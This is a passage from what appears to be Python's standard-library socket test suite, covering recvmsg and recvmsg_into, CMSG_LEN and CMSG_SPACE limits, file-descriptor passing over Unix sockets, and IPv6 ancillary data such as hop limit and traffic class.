len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
